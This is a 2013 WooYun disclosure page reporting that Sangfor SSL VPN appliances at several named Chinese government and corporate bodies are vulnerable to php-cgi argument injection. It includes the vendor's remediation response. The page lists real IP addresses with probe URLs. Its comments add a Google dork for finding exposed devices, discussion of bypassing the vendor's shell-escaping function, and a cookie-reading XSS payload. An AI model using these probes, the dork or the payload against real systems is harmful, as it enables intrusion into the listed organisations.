当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020260

漏洞标题:多家单位深信服SSL VPN远程代码执行漏洞(补丁不及时)

相关厂商:多家单位

漏洞作者: leaf

提交时间:2013-03-18 16:23

修复时间:2013-05-02 16:24

公开时间:2013-05-02 16:24

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-18: 细节已通知厂商并且等待厂商处理中
2013-03-20: 厂商已经确认,细节仅向厂商公开
2013-03-30: 细节向核心白帽子及相关领域专家公开
2013-04-09: 细节向普通白帽子公开
2013-04-19: 细节向实习白帽子公开
2013-05-02: 细节向公众公开

简要描述:

多家单位深信服SSL VPN远程代码执行漏洞(补丁不及时)!
另:厂商有重大漏洞通告么?

详细说明:

河西财政

http://60.29.163.90:1000/cgi-bin/php-cgi/html/redirect.php?-s


宜宾市人民政府

http://221.10.128.90:1000/cgi-bin/php-cgi/html/redirect.php?-s


国家妇幼卫生综合信息平台

http://210.51.181.60:1000/cgi-bin/php-cgi/html/redirect.php?-s


武钢焦化

http://221.232.69.228:1000/cgi-bin/php-cgi/html/redirect.php?-s


国元农业保险

http://220.178.31.50:1000/cgi-bin/php-cgi/html/redirect.php?-s

漏洞证明:

11.jpg


22.jpg


33.jpg


44.jpg


55.jpg


修复方案:

版权声明:转载请注明来源 leaf@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-03-20 22:34

厂商回复:

根据近日的测试,CNVD已经与深信服公司就处置事宜会商应对措施,深信服公司已经对SSL VPN以及AD产品被披露的漏洞进行了修复。针对特定用户的漏洞,深信服公司也表示将积极处置。
20日,转由CNCERT四川分中心处置本条目中涉及的某政府部门案例,另外一个卫生部门的案例已经由深信服公司直接联系处置。
按通用软件漏洞进行评分,rank 10

最新状态:

暂无


漏洞评价:

评论

  1. 2013-03-18 16:38 | lucky ( 普通白帽子 | Rank:409 漏洞数:81 | 三人行必有我师焉########################...)

    围观一下!学习一下!

  2. 2013-03-18 17:13 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    又来了。。。

  3. 2013-03-18 17:35 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    需要我把我的菜刀库给你吗? google: por/login_psw.csp

  4. 2013-03-18 21:06 | 刺刺 ( 普通白帽子 | Rank:603 漏洞数:52 | 真正的安全并不是技术,而是人类善良的心灵...)

    当时14号那天,有个单位比较着急,把cncert的报告发我邮箱了。

  5. 2013-03-18 21:57 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @none 呵呵!你那样Google找不到几个有价值的...大多数是学校而已...

  6. 2013-03-19 09:15 | kgra ( 路人 | Rank:17 漏洞数:2 | 一波还未平息,一波洞又来袭)

    @leaf 那需要怎么找才更全,求指导

  7. 2013-03-19 09:30 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    @leaf 政府 金融 运营商 以及名企的 我搜到不少 呵呵其实只是想知道他们解决方法 呵呵 终于获取到他们过滤函数如下 function MyescapeShellargs($str) { if(is_numeric($str)) { return "'$str'"; } $length = strlen($str); $result = ''; for ($i=0; $i<$length; $i++) { $c = $str[$i]; switch ($c) { case '\'': $result .= '\'\\\'\''; break; default: $result .= $c; } } return "'$result'"; } 轻松绕...新的5.9仍然有问题 包括一个鸡肋https://IP/com/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert(document.cookie)}}//

  8. 2013-03-19 10:01 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @none 呵呵!如果客户端登录和管理都在一个地址是理想的情况,如果是分开的,就麻烦点...尤其有些地址发现存在问题但是不好确定归属...

  9. 2013-03-19 11:05 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    @leaf 他们的WEB客户端和管理端必定在同一设备上 只是存在1000和4430端口情况 以及限制了内网访问管理端的情况 是有少数的表面上不能确定归属的 IP扔到Google上一搜就基本得到答案了 Google搜索漏洞感觉你用得很好 我在此处献丑了 呵呵

  10. 2013-03-19 11:20 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @none 恩!在一台设备上应该没错的,但是我发现很多是这样的,客户端登录是一个公网ip,管理登录是另外一个公网ip...算鸟,先不找了,眼花缭乱的...

  11. 2013-03-19 11:23 | kgra ( 路人 | Rank:17 漏洞数:2 | 一波还未平息,一波洞又来袭)

    @none 那个MyescapeShellargs怎么绕过,我看是已经将整个参数添加了单引号,感觉没办法啊

  12. 2013-03-19 11:28 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    @kgra 在'前面加\ 呵呵 结果变成 ‘\'\'’

  13. 2013-03-19 15:02 | kgra ( 路人 | Rank:17 漏洞数:2 | 一波还未平息,一波洞又来袭)

    @none google了个试了下,不行啊,无法绕过求大神给出具体利用实例?

  14. 2013-03-19 23:20 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    @kgra 5.6及以下可以直接执行 新版本的有权限和他们其他的规避方式 详细自己去研究吧

  15. 2013-05-03 14:20 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @none 洞主为毛不去众测